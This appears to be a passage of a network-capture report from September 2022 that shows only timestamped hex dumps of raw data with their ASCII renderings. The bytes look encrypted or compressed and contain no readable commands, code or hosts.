                                                          2022-09-11 08:16:25 UTC220INData Raw: f8 49 c5 90 5d 1e 53 09 84 f2 e4 f7 02 33 83 f7 10 01 bb 1d d3 82 49 1e d5 1e ce 65 b4 19 17 db 76 d0 cc 5a 89 85 5d 09 9a cd 50 07 5f f4 84 77 b9 29 fa 58 cc d8 ac 36 5a 1f c7 bc 15 9b 47 12 bc 07 8b df 16 2e de d3 14 3b f6 6a 17 b5 79 d4 c2 00 11 ac 27 98 d6 bd 64 ff 44 c8 b4 a1 be 3d 3d e6 0d 00 5c d7 86 2d 74 1b 74 39 f0 a7 7e cb de 6b be 10 c4 f3 13 40 5b e4 e8 03 eb f3 3a 1f ce 74 5c b2 f6 6a 97 71 bd f2 fd b3 67 ed 1a 8c bc 57 b6 00 fc 58 16 47 6a 3c 5d c6 95 5a f6 9b 54 59 99 10 d3 9a 5a 77 89 24 d7 16 6b db ca 17 b0 dc 16 1b cb 66 18 75 8c 92 38 47 0b 78 7b f0 3c 4d 00 42 0f d9 f6 3b 96 59 1a a4 ee 67 90 19 d2 9d 64 e9 be 73 12 1c c7 55 66 a9 da 2b 47 83 0c 4e 52 3a 9b d7 14 3b f6 17 ad bf 67 da 73 9b 50 b9 5b b2 50 f9 1f 41 0c 31 54 d8 04 0a 07
                                                          Data Ascii: I]S3IevZ]P_w)X6ZG.;jy'dD==\-tt9~k@[:t\jqgWXGj<]ZTYZw$kfu8Gx{<MB;YgdsUf+GNR:;gsP[PA1T
                                                          2022-09-11 08:16:25 UTC227INData Raw: 68 22 be fe 62 3a 33 ae bb 72 a5 46 4a a0 fb 6a 33 af cf cd 65 39 3c af d3 d0 69 27 db 9d 76 0d 13 ae af 66 a0 ae 6a 2d ad 84 cb a2 2e 21 65 a1 6b e0 e9 a4 f3 f8 6b 2e 65 22 63 66 69 a2 f9 62 3e a5 39 4f d9 a8 f6 33 ac f4 f8 a5 61 bb 2c 38 69 34 a9 fc 76 e5 f0 a5 61 a1 0e 0a 63 aa 69 d3 f4 ae f1 f9 62 4e a7 0e 39 b8 8b 6e 6b c6 e9 6a 6b 89 82 3c 14 ca c8 54 9b 63 a2 3e f3 6b c2 0c 01 bd ac 51 e1 6f 23 0e 45 68 27 a6 aa cf 41 12 a7 6a b9 6c 05 80 8d 62 2b e1 ad 8c 68 34 a1 7d e0 1a ba 62 84 07 20 88 cf 32 9f 07 24 93 bb 01 f1 dd 40 fe 57 08 c7 16 d8 0c f4 13 69 8d 3b 13 42 ee 0f 6c 8b 67 8c 36 1e ca d4 e4 20 74 a2 2a 86 4e 01 b2 1e da f4 09 79 aa be 6f b3 7e a6 de 76 30 aa 38 c4 98 37 08 4d c2 d3 3f c4 a8 5f 71 81 6f bf 69 dc 14 da 0e a2 5e f0 09 a5 2a e2
                                                          Data Ascii: h"b:3rFJj3e9<i'vfj-.!ekk.e"cfib>9O3a,8i4vacibN9nkjk<Tc>kQo#Eh'Ajlb+h4}b 2$@Wi;Blg6 t*Nyo~v087M?_qoi^*
                                                          2022-09-11 08:16:25 UTC231INData Raw: b4 71 af 69 cf 0c cb 02 0a ae c2 4d 91 6d a7 19 a6 3e a7 56 bd 7d a3 6f 8a 63 83 0e a7 e2 2f 29 e4 7e c7 1f a4 ec 62 2b 43 8a f5 59 b0 18 f4 5c b6 5d 8b 6b ad 67 ce 1e ba 6c a6 49 8b 78 bf 05 a3 ab 6e 10 85 48 ba 66 a1 1b c0 6a d4 50 85 75 df 5d 8e 65 cb 0c c2 09 c5 1f d2 29 8b 75 d5 11 df e5 7e 3d e3 2b ce 75 d4 1e a1 7b a9 77 be 42 e6 c8 ed 83 f1 54 a8 75 de 37 89 19 f2 6f be 4d af 63 c8 c1 49 29 80 1c f0 6a 89 41 f5 4f bc 77 b6 0e a2 30 b4 42 af 68 ba 61 de 6a a7 80 49 38 98 71 a1 6b d2 0b aa 47 8a 6a a4 66 81 7f 8f 12 a7 c3 0a c1 5a b8 37 0e f1 2d 41 8a c4 6a 4a 02 31 3f 93 1c c6 6a c2 79 c1 1c eb 55 b2 57 91 41 94 1c d2 9f 14 b9 c6 b4 bd fb 0b 7b ce 01 a8 0b bb f5 a0 b5 fa 76 b9 6b d1 68 b6 77 ab 1e a7 fb 00 58 a3 17 56 ef 2b 6d 01 4d ae 60 a7 6c 8c
                                                          Data Ascii: qiMm>V}oc/)~b+CY\]kglIxnHfjPu]e)u~=+u{wBTu7oMcI)jAOw0BhajI8qkGjfZ7-AjJ1?jyUWA{vkhwXV+mM`l
                                                          2022-09-11 08:16:25 UTC233INData Raw: a8 34 e1 26 ef 68 df 35 23 98 02 ec 96 dd 23 6a 17 da a4 3c 9c 85 64 d5 59 41 d5 3b bd 88 5d 63 a7 30 6c d9 d1 51 a3 25 e6 61 01 9a 9f fb 26 72 c0 6e e0 33 a2 9a 02 9f 3a 53 03 a4 ee 3d 29 13 a2 9f 64 92 89 7b a4 6a db c2 5f 5f ea 3f e7 58 e5 6c 00 f3 71 b5 e3 ce 32 6f bb 6f ad 69 e4 db 37 39 75 c7 4b 79 54 9a 75 f3 38 3d c6 4c d4 6c 52 97 be 19 d6 9c 43 68 49 8c a6 13 84 5b b2 ec 47 6d b8 6f ae 68 a5 4b a0 41 cf 68 a5 6a b8 e5 19 2e f5 27 a1 6d 71 ca c5 79 17 a8 d5 19 c9 93 84 d4 8b 4d 32 e1 dc 9f 29 61 9b 15 b0 2a e6 6f b5 7d b6 5f f4 5c a7 48 84 38 9c 67 ae 6a 8e 27 d7 77 a1 99 a3 a9 f0 d7 1a d6 48 71 3f 84 98 cc c1 a2 be 76 4a 98 b5 7b e4 49 b2 6c a4 39 d2 43 a4 06 c3 6b b0 48 96 7f bb 55 99 73 d6 2e ae e3 ed db 29 c6 fc 1c 96 2e e3 06 3b 9a f2 51 a0
                                                          Data Ascii: 4&h5##j<dYA;]c0lQ%a&rn3:S=)d{j__?Xlq2ooi79uKyTu8=LlRChI[GmohKAhj.'mqyM2)a*o}_\H8gj'wHq?vJ{Il9CkHUs.).;Q
                                                          2022-09-11 08:16:25 UTC239INData Raw: 6c 60 ac 49 a7 88 76 73 2f c2 cc 3e 71 ce b8 5d 6a 8d d4 fe 04 88 6e 62 46 8f ce 79 82 f3 74 30 c1 ca 38 29 e4 51 0e cd ec 3b 9a 16 d7 a6 4c c4 18 d7 50 77 a7 4e 9f db 10 70 a7 3e 1c c7 8b 69 89 45 a5 e9 37 33 8d 6d aa de 7a 27 87 6a ea 1b a4 2d b2 6b eb 3c b4 42 98 6b bd 6c a6 39 bd 7c db 09 b9 7d a0 2f ac 67 ab 48 8e 67 a0 63 fd 70 d5 6b be 61 cc 7f b8 6d f4 6d b2 46 84 60 a2 67 a4 6b ac 32 d7 00 f9 76 b1 3e bf 6b 94 2a e0 5c fa 78 a7 7c af 65 80 43 b2 33 ca 62 8c 77 e9 70 cd 52 a0 76 f3 23 b7 61 aa 42 87 66 b5 34 e7 6e ad 7b 98 48 bb 76 ae 78 fe 24 ab 48 87 3d fc 78 b9 29 ff 2d db 00 a0 27 ab 65 a0 65 a4 5a 81 6d 85 d8 03 27 ee 0e a7 76 d6 53 a1 6d a1 6d 9a 4d af 8b 4f ec 0a 0c 74 df d0 7b 2a 8e 81 4d a0 54 b1 6c b1 6d bc 77 aa 1d 00 8f 86 48 9a 7d b3
                                                          Data Ascii: l`Ivs/>q]jnbFyt08)Q;LPwNp>iE73mz'j-k<Bkl9|}/gHgcpkammF`gk2v>k*\x|eC3bwpRv#aBf4n{Hvx$H=x)-'eeZm'vSmmMOt{*MTlmwH}
                                                          2022-09-11 08:16:25 UTC243INData Raw: 57 9a 8d 41 c9 04 f8 35 38 f5 28 e5 4b 86 f7 3d 7d b0 fc 33 08 c5 34 f9 22 ef 5e 93 57 9a 47 8a 6a a7 9d 51 85 48 b5 78 ac 61 f3 3e e0 2d e7 2a 5c 91 4d 80 43 8e 7b b6 71 bc 6b a6 98 6a a7 da 17 6a 0b c6 a7 6a a9 54 aa 67 c7 0a 15 d8 2c e1 72 bf 86 4a 80 4d 89 44 a3 6e a8 65 c4 09 fd 30 e7 2a ed 20 31 fc 5c 91 49 84 65 a8 c3 0d 51 9c 5e 93 7f b2 8a 46 ac 61 aa 67 62 af ac 66 ac 61 c0 0d fa 37 0d c0 30 fd 4a 87 79 b4 98 54 87 4a 8d 40 af 62 d6 1b c3 0e fe 33 02 cf 3c f1 21 ec 54 99 59 94 4d 80 7e b3 61 ac 8a 44 bf 72 f5 38 e3 2e 10 dd 16 db 34 f9 21 ec 4b 86 64 a9 b7 7b d2 1f f7 3a e9 24 59 94 6d a0 82 40 d3 1e cb 06 fc 31 ed 20 1f d2 0b c6 03 ce 37 fa 2f e2 56 9b 49 84 63 ae 98 56 f1 3c 86 4c 9b aa 67 6a 8f 42 a7 6a 4d b3 3e f4 f9 35 ee 23 1c d1 21 ec 28
                                                          Data Ascii: WA58(K=}34"^WGjQHxa>-*\MC{qkjjjTg,rJMDne0* 1\IeQ^Fagbfa70JyTJ@b3<!TYM~aDr8.4!Kd{:$Ym@1 7/VIcV<LgjBjM>5#!(
                                                          2022-09-11 08:16:25 UTC244INData Raw: 70 bd 79 b4 63 ae 6c a1 97 59 bf 72 ab 66 f9 34 1b d6 37 fa 49 84 75 b8 71 bc 7d b0 79 b4 65 a8 87 4b b2 7f d5 18 dd 10 f6 3b e2 2f 36 fb 39 f4 20 ed 57 9a 5a 97 42 8f 94 5e 95 58 d9 14 50 9d 7b b6 61 ac bc 70 f2 3f 58 95 82 4c 8e 43 1a d7 05 c8 24 e9 5d 90 9e 52 c4 09 f0 3d 0a c7 29 e4 5f 92 63 ae 95 57 b7 7a b0 7d fd 30 4e 83 78 b5 ca 06 1d d0 14 d9 7f b2 72 bf 69 a4 9c 52 90 5d 85 48 b0 7d a0 6d f4 39 06 cb 24 e9 55 98 77 ba 64 a9 86 4a b6 7b d0 1d c7 0a e1 2c 0c c1 3b f6 7b b6 91 5b 52 9f 6b a6 95 59 86 4b b7 7a 3d f0 36 fb 28 e5 23 ee 46 8b 18 d6 09 c4 99 6a a7 3a f6 6b a3 6f a6 6a e9 14 c9 04 e3 2e ea 27 5d 90 9f 53 99 54 b2 7f a0 6d d6 1b d9 14 f4 39 f8 35 ed 20 5c 91 b7 79 bb 76 ae 63 17 da 3d f0 24 e9 2f e2 5c 91 4f 82 74 b9 a4 68 ad 60 d8 15 f0
                                                          Data Ascii: pyclYrf47Iuq}yeK;/69 WZB^XP{ap?XLC$]R=)_cWz}0NxriR]H}m9$UwdJ{,;{[RkYKz=6(#Fj:koj.']STm95 \yvc=$/\Oth`
                                                          2022-09-11 08:16:25 UTC248INData Raw: 51 9c 6d a0 90 5e 84 49 f7 3a 03 cf 28 e5 91 5b 8c 41 86 4b b8 75 15 d8 0c c1 4b 86 40 8d 4b 84 9a 56 90 5d 98 7a b4 69 27 ea a7 6a 89 74 d1 1c e4 29 19 d4 09 c4 34 f9 3a f7 25 e8 2a e7 5f 92 4b 86 ba 76 47 8a 72 bf 65 a8 82 4c f8 35 ed 20 52 9f 4a 87 bc 70 2b e6 42 8f c0 0a 0b c6 39 f4 73 be 76 bb 61 ac 6d a0 84 48 b8 75 cf 02 fe 33 e3 2e 10 dd 1a d7 01 cc 09 c4 34 f9 3e f3 25 e8 2f e2 59 94 46 8b 4b 86 6b a6 6c a1 b6 78 c9 04 ee 23 08 c5 51 9c 4c 81 97 5b a6 6b f9 34 ec 21 b1 70 00 cd 9c 4a 84 69 ef 22 a7 6a c4 33 f1 3c 2c e1 27 ea a9 65 a1 6c d5 1f c9 04 12 df 09 c4 53 9e 07 cb 3a f7 3e f3 32 ff 36 fb 2a e7 2e e3 22 ef 26 eb 5a 97 42 8f 3a f4 3d f0 31 fc 35 f8 29 e4 2d e0 21 ec 25 e8 59 94 5d 90 99 5a 94 69 bf 72 a7 6a 67 90 9a 56 90 5d 8d 40 b0 7d ad
                                                          Data Ascii: Qm^I:([AKuK@KV]zi'jt)4:%*_KvGreL5 RJp+B9svamHu3.4>%/YFKklx#QL[k4!pJi"j3<,'elS:>26*."&ZB:=15)-!%Y]ZirjgV]@}
                                                          2022-09-11 08:16:25 UTC250INData Raw: cc 00 c7 0a c0 0d fa 37 eb 26 55 98 43 8e 71 bc c1 0f 5d 90 86 4a 15 d8 34 f9 45 88 b2 79 f2 3c 1a d7 00 cd 36 fb 2e e3 99 7a b3 6e 9f 52 a7 6a b7 48 86 4a b0 7d 3e f5 22 ef 54 9a 5a 97 4c 81 6a a7 9e 52 85 48 01 c3 31 fc cd 02 f3 3e 32 fe 53 9e 85 4f aa 67 ad 60 3a f7 3f f3 2f e2 55 9a 98 4a 83 6e f3 3e a7 6a d7 2a 1f d2 19 d4 01 cc c5 0a 1c d5 4e 83 13 d0 44 89 f5 39 27 ea 43 8d fd 37 08 c5 28 e5 48 85 68 a5 88 46 ab 66 cb 06 eb 26 0b c6 2b e6 4b 86 6b a6 8b 47 a4 69 fa 37 e5 28 09 c4 3c f1 36 fb 20 ed 7a b7 73 be 6a a7 63 ae 98 6a a7 5a 93 6e b3 7e a7 6a a5 58 9c 51 86 4b 8b 46 a6 6b 97 6a a7 2a e3 6e f7 3a a7 6a ef 14 c1 0c c5 08 c9 04 cd 00 f1 3c f5 38 f9 34 e5 28 e9 24 ed 20 19 d4 1d d0 01 cc 51 9c 55 98 59 94 5d 90 45 88 49 84 4d 80 65 a8 69 a4 6d
                                                          Data Ascii: 7&UCq]J4Ey<6.znRjHJ}>"TZLjRH1>2SOg`:?/UJn>j*ND9'C7(HhFf&+KkGi7(<6 zsjcjZn~jXQKFkj*n:j<84($ QUY]EIMeim
                                                          2022-09-11 08:16:25 UTC254INData Raw: a7 14 31 6a a7 d3 15 4e 87 55 df a9 dc 72 c6 e3 a7 6a eb ad d4 da 6a 02 3e 7e 83 a5 5b 19 e2 92 1a 6e a7 6a 24 8d e7 1e f7 2b 6d 37 30 93 1f 5a 97 6a 94 90 91 43 39 a9 dc d2 6a 2f 13 22 16 ac 10 d3 69 27 29 af 6e 0a d3 72 64 37 39 ab 6a 0a ab 0e 66 a8 e0 eb 62 02 a3 f3 1c 68 a7 6a 58 40 f9 b5 d7 1e bf a9 e2 4c 50 77 a5 6a 94 8b 34 93 1f ea 27 6a ef a9 e2 e5 19 42 38 a9 70 12 db 7a 64 8d ef 2e 8f a9 58 3a eb 4a 6c 2d 53 1b b9 74 b8 6b 3b e1 64 e5 87 8d a8 6a a7 ee 66 bf df 56 36 af cf 46 fa 69 a6 75 62 8b ef f7 56 a3 ca 46 67 6a a7 0f 8a a9 28 4b e2 0a a7 6a 94 82 bb e8 45 e3 89 2e e3 22 28 e8 49 8d eb 26 eb 22 64 b1 ef 3e 60 b3 e5 37 61 a3 d5 17 6f 2f 68 e1 5c 14 a6 6a ee 40 84 16 10 2a 2d 24 b8 38 bd 7f 61 f3 f7 a3 90 d6 2f e2 a7 6a e5 a3 a8 ee 2b e6 a7
                                                          Data Ascii: 1jNUrjj>~[nj$+m70ZjC9j/"i')nrd79jfbhjX@LPwj4'jB8pzd.X:Jl-Stk;djfV6FiubVFgj(KjE."(I&"d>`7ao/h\j@*-$8a/j+
                                                          2022-09-11 08:16:25 UTC255INData Raw: d2 1c 54 21 53 3d c7 a9 e7 e9 ec 92 1d a6 5a 1b 2d 37 8e 42 f5 2f 12 02 ff 1c 54 99 46 f0 64 2a 93 42 43 8b 34 93 1f ea 27 6a ef a9 e7 e0 19 41 9a 25 fd 69 a7 1e ea e4 64 bd df 3e 9f a1 e0 9e d6 74 b9 75 b8 76 bb 77 a4 6b a4 f4 a8 6a a7 f2 48 d5 a3 32 7f b4 a1 f1 85 1b 6a 67 af 5c 91 72 be 5c 7c 1b 48 1a a7 e8 4a 63 45 eb a0 21 d4 56 af 05 41 ba 02 9a 85 68 8c 61 a5 66 a9 6a 3d f4 a3 6a 03 80 eb 6a ae 49 3d 58 24 79 b5 6d 6c 24 25 ef a1 ee a2 63 ab 6f a7 68 a5 61 6d 2e 21 69 87 4d a0 6a a7 71 3d ff eb 30 a5 0a c7 7f b1 73 bd 6e a0 69 a8 60 a6 e8 26 eb 29 63 bf 73 1f f1 82 e4 2f 3e f2 6a a3 68 a0 8a c6 e8 c4 aa 01 6c eb 6b e8 65 a9 6b b5 7b 26 c5 85 67 a7 8a e4 cc a2 6c 99 5a a4 6c af 4f 23 cb a2 fe f2 a2 a4 d0 13 6e 2f ee e6 2e 61 a6 d8 4e 66 f3 88 84 40
                                                          Data Ascii: T!S=Z-7B/TFd*BC4'jA%id>tuvwkjH2jg\r\|HJcE!VAhafj=jjI=X$yml$%coham.!iMjq=0sni`&)cs/>jhlkek{&glZlO#n/.aNf@
                                                          2022-09-11 08:16:25 UTC259INData Raw: ee e1 d2 dd ed 9f 1d af 5b 1f 7f f7 69 07 09 a9 79 07 bd 05 1b 88 7a 4c cc b9 f5 21 ed 7b 40 6e 46 93 c4 a0 ef e9 79 7f af ab 7b 6f 9b 0e ac b8 39 2d 47 50 a4 cb d2 23 60 70 b7 9f 9c 2d ec 21 07 0f 82 a6 c7 26 cf 4e eb 9f ea dc a9 2e 62 8e 8a 22 4a 04 71 67 6f bb 65 37 31 1e 12 d8 68 90 61 a0 e7 23 f4 30 63 35 3e 8a 7e bb 45 20 6f 61 71 07 98 d2 93 49 47 23 8e 2c 42 11 5e 1e 90 2e a9 27 e6 e5 eb 7d fc 0a 46 24 68 a4 e0 88 c7 e4 ec 04 48 e6 64 aa fc 42 da 1c 5d 13 48 ca 08 2a 87 df e2 df 9c 25 a7 b9 75 62 44 63 0d b2 34 6b d0 23 7a 87 34 f6 35 f8 06 88 76 f8 27 28 6e b4 72 79 67 b9 f0 7e af 37 b3 63 9f 70 32 74 3c 1c fd f7 cf b2 0c fe d7 de 65 a7 80 0d aa 6a d4 d6 2d 46 4e 5b 54 cb a6 00 c5 03 c7 6b 6f 96 fc 7a b8 b4 79 4b 86 6a cd 20 87 6a 0f 97 c2 5a 5c
                                                          Data Ascii: [iyzL!{@nFy{o9-GP#`p-!&N.b"Jqgoe71ha#0c5>~E oaqIG#,B^.'}F$hHdB]H*%ubDc4k#z45v'(nryg~7cp2t<ej-FN[TkozyKj jZ\
                                                          2022-09-11 08:16:25 UTC261INData Raw: e1 26 b7 a3 7a 61 8a 99 7a 76 e9 25 ff a7 f9 b1 d3 58 a9 ab 5a 3a b3 12 ef e1 5b 05 f7 19 42 c0 c2 3b af a9 e7 49 aa 83 ab c6 88 ed 60 89 87 7a c2 f0 00 a9 7b 3d b7 36 60 a6 c0 06 c0 83 e5 a3 2f 53 5a 87 c7 ed a8 64 af e7 2c 73 3e 68 ac a4 f0 32 66 b7 b4 35 3f eb 86 cb ae da 1f 62 0f 53 37 6b 6f 79 75 6e 23 fc e9 fb 66 e7 22 63 2f 2a ae a8 fc 33 af f9 25 7b 62 a5 ad 6a af ae 89 c8 6e 26 6a eb aa ff b4 28 62 86 5b 56 71 15 a9 6e ae 95 59 2d 43 4a fc 79 10 b0 4f 2e 2a 6e a6 e9 97 98 b4 6f b0 7d b9 a3 24 84 49 1f 5b e4 c7 2d 83 6c 27 a2 dc 9d 2b ab aa ca 82 05 c9 26 60 13 1c a8 dc a9 46 b8 ef a9 f5 fb 6c 28 4e 06 e3 e7 68 78 1f e8 c7 63 a4 aa 2a a2 d4 93 2c 5f 94 0c 43 6e a1 c0 0f 6e ea a8 2a 24 62 ab eb 4e cb 6a 66 af cf 66 c3 36 3a e2 0e 0f ee 41 81 ea 6f
                                                          Data Ascii: &zazv%XZ:[B;I`z{=6`/SZd,s>h2f5?bS7koyun#f"c/*3%{bjn&j(b[VqnY-CJyO.*no}$I[-l'+&`Fl(Nhxc*,_Cnn*$bNjff6:Ao
                                                          2022-09-11 08:16:25 UTC265INData Raw: ca d3 10 dd 70 5c 9b 20 70 9d b0 81 45 2b 64 e6 e8 ab 2d 99 1b af 19 15 af 2e 22 27 8b 8a e7 4f 2b 43 27 ed 27 c9 77 29 b0 2c 21 c2 ae ed 1b 57 a1 49 42 4f 71 1e 7c 50 15 19 8f 22 24 2e 40 02 66 9f ff 1e 5b 2f 19 7d bb 92 2a 1b 1d bc cd 55 51 da e1 3f 92 6e 42 1d 5c 22 63 1d 44 3a 85 74 9d 7d f2 58 a5 09 79 cf 66 b5 98 e3 2e e3 5b 1f 8e 1d 49 13 06 43 8c 09 c7 2a e2 06 9e b3 47 3b 16 e7 d2 53 ce 7d f7 cb 61 6b a6 6b c1 4d 65 90 c8 7f d0 17 ae 2b 6d a8 f2 75 6a 2d 65 21 ef 6a 62 ac b4 cd 4d a5 7d 19 d0 6e 2c aa a4 ca bd ba e1 8e 16 d2 6d 69 e6 07 c1 06 81 ed 63 68 a6 83 ed 09 42 03 6f 65 ea 0e 18 bf 87 cb 06 82 a3 66 24 aa ac ca d8 fd 96 3a fe 56 dd 16 6d c6 6b c1 ed 13 74 85 a2 4b 89 5c d7 a9 6f 21 e7 a9 2e 3b 74 61 ee e0 64 a9 df 12 af 29 75 f3 66 b3 b7
                                                          Data Ascii: p\ pE+d-."'O+C''w),!WIBOq|P"$.@f[/}*UQ?nB\"cD:t}Xyf.[IC*G;S}akkMe+muj-e!jbM}n,michBoef$:VmktK\o!.;tad)uf
                                                          2022-09-11 08:16:25 UTC266INData Raw: aa bb f5 23 ec ac 62 a0 2f d4 b9 c3 e7 9d 9a e0 4f 9f 71 2d 53 05 f0 8b 8f a0 bc 19 49 ad ec 94 58 7f a5 11 cf 6e 61 e8 c7 0e af 4f 82 a9 63 2d ae 3e ba fb de f7 db 93 7f 0e 53 c8 20 ef f3 9f 54 6a 66 1a 17 81 25 0d aa 6a 4c b3 44 32 2a 56 8d f8 23 e6 2a b7 70 7c 4c 98 4f 52 f7 26 0a 0e d2 f1 eb c6 cd 35 19 c3 d4 00 8f b9 93 80 45 bb ea e1 4a 27 c1 c7 e7 c0 c2 e3 3e 0e 84 c6 4d 23 da 4a 7e b5 d1 18 d6 85 1e 46 97 73 8e c2 3e b2 2d 31 c8 e5 f8 e3 6e d5 c7 7a ab 36 e0 7d a7 e1 6e 6a c5 4f 6d 2c 69 05 ac 48 ab 2d f4 d8 04 df 3a 48 e4 d4 88 87 55 e6 75 fd c3 07 c2 1a bd 6a 76 8a 93 4e 76 83 8d 99 2b ab 2a 6e 2a a7 e3 4e a3 02 62 f2 c2 37 8f 74 4d a9 44 f9 78 e7 a6 69 b0 ac 57 99 d6 0b 76 43 64 56 81 98 31 ec 83 ec 60 0d 84 49 26 05 11 23 a0 27 ed 6a 0d 23 74
                                                          Data Ascii: #b/Oq-SIXnaOc->S Tjf%jLD2*V#*p|LOR&5EJ'>M#J~Fs>-1nz6}njOm,iH-:HUujvNv+*n*Nb7tMDxiWvCdV1`I&#'j#t
                                                          2022-09-11 08:16:25 UTC270INData Raw: b8 6f a7 82 5e 27 f9 68 6b 4e 1b 09 75 ce e7 5a d4 29 8d 03 e4 4e 8f 25 e4 74 f9 2a 65 ce 80 7f a4 6b b0 62 62 4b 2f 5e 41 5c 27 ab ae 0e bb 90 ec 16 9f d1 e8 9f c9 88 aa 0f 4e 62 a2 94 15 ab af d8 94 e1 dd a8 46 f0 62 6a fa 3a 22 6f a7 2b 5e c2 b3 2e 63 ea 1e 0e 3f 0b 48 5a 4d 7b fb 32 a3 6e ef 41 14 f2 62 ea ae bc 74 ab 69 e9 2f a4 75 76 a2 6a eb ad eb cb 42 95 8c 7d 19 c8 b3 af 3f 7c 24 cf ca aa 20 21 22 6f 6c 29 60 29 ee 6a 96 9a 18 80 18 80 98 14 3d 81 93 28 bc b7 e4 be 30 b8 b4 1b 57 b8 0a e0 d5 45 bd 98 8e 43 4c 41 67 97 13 7f 3f 4a a3 ca 42 87 6b 0a b3 69 94 b1 1a 03 b7 31 e3 6a a8 e5 90 90 76 90 fa 5c df 5f fc 71 a8 d2 55 b1 4c 12 cc 37 f8 0b c8 01 a5 ed 56 9f a8 a5 e1 33 51 c3 a4 1c c8 30 e2 37 fe 69 b4 7b ae e9 8d ca a4 24 ea 69 ab e1 71 b8 2f
                                                          Data Ascii: o^'hkNuZ)N%t*ekbbK/^A\'NbFbj:"o+^.c?HZM{2nAbti/uvjB}?|$ !"ol)`)j=(0WECLAg?JBki1jv\_qUL7V3Q07i{$iq/
                                                          2022-09-11 08:16:25 UTC272INData Raw: 7c aa e4 62 b5 90 cf 7c 88 23 62 2f c9 14 b6 0a f5 68 96 0b 16 49 e0 de 96 75 29 f0 b6 67 db 01 17 a6 8a 32 66 8f ef 0c 45 ea 4e d3 c7 33 65 31 67 33 f6 52 ec b3 2f 91 55 60 d6 af 07 dd 2c cb 04 a9 6c 31 d7 12 d4 b9 40 e7 a7 89 45 ef 58 bb 8d 68 fa 27 fd ad 2e 2e 27 e2 d4 94 6d e3 c2 19 23 62 bf 2e cc a9 07 f3 8b db 2b ab 24 ea 2d a2 cb 0f 65 21 2f 09 49 2f 6f 19 64 da e0 22 18 53 66 6a 50 4d 3f 19 5b a2 2e 95 df da 17 e6 1e 66 d7 a7 dd 9a 4c 0a 64 ed 67 22 57 72 6e 42 ce 42 3d e0 47 95 2f 8b e0 4a 9d 9f 1a 3b a6 db 20 b4 84 7e 2a 55 6c 19 99 ad 2c f5 3d ea 2d a2 94 11 4c 17 38 4d 02 5e f8 a2 cc a7 d4 e9 b8 ec fa eb d4 29 17 23 ce 8b 97 30 f4 a2 ac ea ca 85 2f 82 a2 87 ac 37 80 b6 ca 0b 17 33 e5 30 c2 95 2c 2d d4 1c b0 7f 1f c2 fb ab 2e 51 d0 22 2a f3 d9
                                                          Data Ascii: |b|#b/hIu)g2fEN3e1g3R/U`,l1@EXh'..'m#b.+$-e!/I/od"SfjPM?[.fLdg"WrnBB=G/J; ~*Ul,=-L8M^)#0/730,-.Q"*
                                                          2022-09-11 08:16:25 UTC277INData Raw: a4 b9 33 df a5 e1 a2 52 13 1d d2 be 36 aa cf f3 c2 74 1f d4 fe 35 a7 d2 b0 d3 f6 e3 81 9d bf 2a e4 99 5f 7c fc ac e8 ef 12 15 fb 8f 8d 14 11 b9 b6 f1 7f 05 98 11 f9 db 10 f8 47 bb e2 ff b6 6b b9 35 e6 75 b8 76 bb 77 a4 6b 59 91 a1 f4 f4 aa e7 4d 13 d6 98 c0 0d 5f 93 0c 70 db 26 da 97 3d c0 5a 0d a2 f5 5a c9 34 97 34 c9 5a d2 2f 97 6c df 24 97 9b 05 29 e1 74 6c 05 6b 6a b4 90 27 40 b4 3b 74 67 94 b3 32 3a 7d c0 2e 21 8d f2 24 b9 64 1b c4 f9 6e b2 cd 43 1e a3 d0 06 a3 3d 1a 87 70 f4 3b 9f ee f4 9b 9b 5b 72 56 bc a7 7b b4 4c ce 16 d3 a5 fa 8d a6 5b 4e 46 c6 0e 3d 91 08 9e 71 56 77 a9 76 00 13 47 91 83 4d aa d8 f2 54 9a 91 7f b0 13 6b ea 1c 51 52 02 aa 38 f5 da 78 76 a9 76 57 d3 9f 16 6b 61 dd a8 5d 5c 4d 88 80 b8 c5 8f e2 a5 2c 55 ac d9 a0 6a 27 cb a6 4f 3d
                                                          Data Ascii: 3R6t5*_|Gk5uvwkYM_p&=ZZ44Z/l$)tlkj'@;tg2:}.!$dnC=p;[rV{L[NF=qVwvGMTkQR8xvvWka]\M,Uj'O=
                                                          2022-09-11 08:16:25 UTC281INData Raw: 5c b3 da 16 1e e7 4f 97 1b cd 93 d9 31 ff 75 ba 2f 29 d4 d1 ee 5f da e9 0c e8 cf 01 b4 33 c5 67 69 ab 1c f1 88 ec d0 05 8f b3 d5 be 23 11 5f aa f2 bf 53 55 ee 66 92 54 ac 9b ba 8f e0 f5 99 8c 40 a8 e3 04 2d ec cc 0d ef 48 cd 22 b5 3f 84 3b 31 95 5f fb 59 b8 e6 3a 6a 87 14 c5 fc 00 f2 73 0e c3 4e 80 52 e3 81 bb 34 7a af 74 16 c1 6b a5 e8 64 8b 14 91 c0 1a 7f 93 75 95 d9 9c ad ff 5e f7 7f ba af 86 e2 c3 ea ea af e7 e3 ca 46 c7 d3 f6 a9 29 b8 70 c6 0e 6f ef 11 50 e6 66 e7 26 5f 97 fb b9 d2 0d 91 b9 93 a6 68 28 ab cf 7e 7f 96 5b c3 26 db 29 53 24 8f 44 29 d7 ad 12 8c 83 30 b4 9e 5a a2 66 a7 bb 16 fb 5a 0e 88 24 e8 ff b3 26 f8 37 65 1f 0e 3c ab 6b a7 a6 a3 9a df 27 ab 53 af 7f 0a 67 2a ae 9e 7e 86 66 9f ff ae 00 25 d3 32 f3 1a a5 f0 d7 14 cd 96 58 6a 57 d2 55
                                                          Data Ascii: \O1u/)_3gi#_SUfT@-H"?;1_Y:jsNR4ztkdu^F)poPf&_h(~[&)S$D)0ZfZ$&7e<k'Sg*~f%2XjWU
                                                          2022-09-11 08:16:25 UTC283INData Raw: 2e 2e c7 76 76 b0 6a 6b a7 97 69 af ae 22 66 bf df 56 ea 3f ef af 46 22 73 d2 6e 07 49 78 b6 35 72 e4 2d 46 01 6f a7 22 dc 9d 2b ab 6b 2f a8 75 00 c0 1b 24 48 67 27 ab cf 0e b7 72 66 5f 3f 66 8f 4b 6e 82 60 73 86 6a 6b a6 9e e9 c6 8e 24 29 fb 5c 16 b0 fa 4b 7a 43 2e 47 12 ba ed 4e 0c e2 ac 67 b7 69 07 d5 1f 0e 74 7c 19 4b 53 37 6f ca 66 9e 02 b2 a4 89 ce b1 88 17 f1 41 52 e2 ad f0 37 69 1c d2 4f ce 18 66 a7 9a 1f 98 62 1a 13 21 1f d8 a2 c6 0b 02 cf e3 53 df 09 8f dc 93 a9 6d 2a 79 31 6a 1c 5a 61 af 67 2a 22 f2 95 cd 67 4c 48 9f ff ee 2f 